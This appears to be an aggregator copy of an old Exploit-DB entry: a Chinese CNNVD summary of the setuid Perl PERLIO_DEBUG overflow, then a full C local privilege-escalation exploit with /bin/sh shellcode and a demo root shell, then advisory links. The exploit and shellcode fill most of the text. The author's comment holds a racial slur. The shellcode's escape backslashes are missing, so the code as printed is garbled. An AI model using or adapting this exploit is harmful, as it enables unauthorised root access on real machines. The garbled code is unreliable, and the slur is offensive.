https://www.exploit-db.com/exploits/791
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-006

Perl是流行的跨平台编程语言。部分Perl脚本在处理PERLIO_DEBUG变量时存在问题，本地攻击者可以利用这个漏洞破坏系统文件或进行缓冲区溢出攻击。攻击者可以通过设置PERLIO_DEBUG环境变量和调用任意setuid-rootperl脚本来覆盖任何文件，PERLIO_DEBUG指向的文件然后会被PERL调试消息所覆盖，这个问题不能精确控制文件内容，但可以破坏重要数据。另外如果PERLIO_DEBUG设置，调用带超长路径的setuid-perl脚本，可导致缓冲区溢出，精心构建提交数据可能以root用户权限执行任意指令。

/*
 * Copyright Kevin Finisterre
 *
 * Setuid perl PerlIO_Debug() overflow
 *
 * Tested on Debian 3.1 perl-suid 5.8.4-5 
 *
 * (11:07:20) *corezion:* who is tha man with tha masta plan?
 * (11:07:36) *corezion:* a nigga with a buffer overrun
 * (11:07:39) *corezion:* heh
 * (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
 *
 * cc -o ex_perl2 ex_perl2.c -std=c99
 * 
 * kfinisterre@jdam:~$ ./ex_perl2
 * Dirlen: 1052
 * Charlie Murphy!!!@#@
 * sh-2.05b# id
 * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) 
 * 
 */

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
{
	int len = 23;
 	int count = 5;
	char malpath[10000];
	char tmp[256];
	char *filler;
	char *ptr;

	unsigned char code[] = 
	/*
	  0xff-less execve() /bin/sh by anathema <[email protected]>
	  Linux/IA32 0xff-less execve() shellcode.  
	 */
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

        // setuid(0) - fix for redhat based machines
	"x31xdb"                      // xorl         %ebx,%ebx
	"x8dx43x17"                  // leal         0x17(%ebx),%eax
	"xcdx80"                      // int          $0x80

	"x89xe6"                          /* movl %esp, %esi          */
	"x83xc6x30"                      /* addl $0x30, %esi         */
	"xb8x2ex62x69x6e"              /* movl $0x6e69622e, %eax   */
	"x40"                              /* incl %eax                */
	"x89x06"                          /* movl %eax, (%esi)        */
	"xb8x2ex73x68x21"              /* movl $0x2168732e, %eax   */
	"x40"                              /* incl %eax                */
	"x89x46x04"                      /* movl %eax, 0x04(%esi)    */
	"x29xc0"                          /* subl %eax, %eax          */
	"x88x46x07"                      /* movb %al, 0x07(%esi)     */
	"x89x76x08"                      /* movl %esi, 0x08(%esi)    */
	"x89x46x0c"                      /* movl %eax, 0x0c(%esi)    */
	"xb0x0b"                          /* movb $0x0b, %al          */
	"x87xf3"                          /* xchgl %esi, %ebx         */
	"x8dx4bx08"                      /* leal 0x08(%ebx), %ecx    */
	"x8dx53x0c"                      /* leal 0x0c(%ebx), %edx    */
	"xcdx80"                          /* int $0x80                */;


	chdir("/tmp/");

	// do one less char than usual for RedHat 
	filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
	
	for (int x=0; x<4; x=x+1)
	{
		mkdir(filler, 0777);
		chdir(filler);
		// do one less char than usual for RedHat 
		count = count + 255;		
	}

        memset(tmp,0x41,len);  
	count = count + len;

        ptr = tmp+len;
        ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
        ptr = putLong (ptr, 0xbffffb6a); 
        ptr = putLong (ptr, 0xbffffb6a);

	strcat(tmp, "/");
	mkdir(tmp, 0777);
	chdir(tmp);

	printf ("Dirlen: %dn", count); 

	FILE *perlsploit;
	char perldummyfile[] = {
                "#!/usr/bin/sperl5.8.4n"
                "# n"
                "# Be proud that perl(1) may proclaim: n"
                "#   Setuid Perl scripts are safer than C programs ...n"
                "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. n"
        };

        if(!(perlsploit = fopen("take_me.pl","w+"))) {
                printf("error opening filen");
                exit(1);
        }
        fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
        fclose(perlsploit);

	getcwd(malpath, 10000);
	strcat(malpath, "/");
	strcat(malpath, "take_me.pl");
	printf("Charlie Murphy!!!@#@n");

	chmod(malpath,0755);
        setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
	setenv("PERL5LIB", code, 1);
	execv(malpath,(char *) NULL);

}
/*
 * put a address in mem, for little-endian
 *
 */
char*
putLong (char* ptr, long value)
{
    *ptr++ = (char) (value >> 0) & 0xff;
    *ptr++ = (char) (value >> 8) & 0xff;
    *ptr++ = (char) (value >> 16) & 0xff;
    *ptr++ = (char) (value >> 24) & 0xff;

    return ptr;
}

// milw0rm.com [2005-02-07]

来源:XF
名称:perl-perliodebug-bo(19208)
链接:http://xforce.iss.net/xforce/xfdb/19208
来源:TRUSTIX
名称:2005-0003
链接:http://www.trustix.org/errata/2005/0003/
来源:BID
名称:12426
链接:http://www.securityfocus.com/bid/12426
来源:REDHAT
名称:RHSA-2005:105
链接:http://www.redhat.com/support/errata/RHSA-2005-105.html
来源:REDHAT
名称:RHSA-2005:103
链接:http://www.redhat.com/support/errata/RHSA-2005-103.html
来源:GENTOO
名称:GLSA-200502-13
链接:http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0131b%5D.txt
来源:FULLDISC
名称:20050207DMA[2005-0131b]-‘SetuidPerlPERLIO_DEBUG
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=110779721503111&w;=2
来源:BUGTRAQ
名称:20050202[USN-72-1]Perlvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110737149402683&w;=2
来源:MANDRAKE
名称:MDKSA-2005:031
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
来源:SECUNIA
名称:14120
链接:http://secunia.com/advisories/14120
来源:FEDORA
名称:FLSA-2006:152845
链接:http://fedoranews.org/upd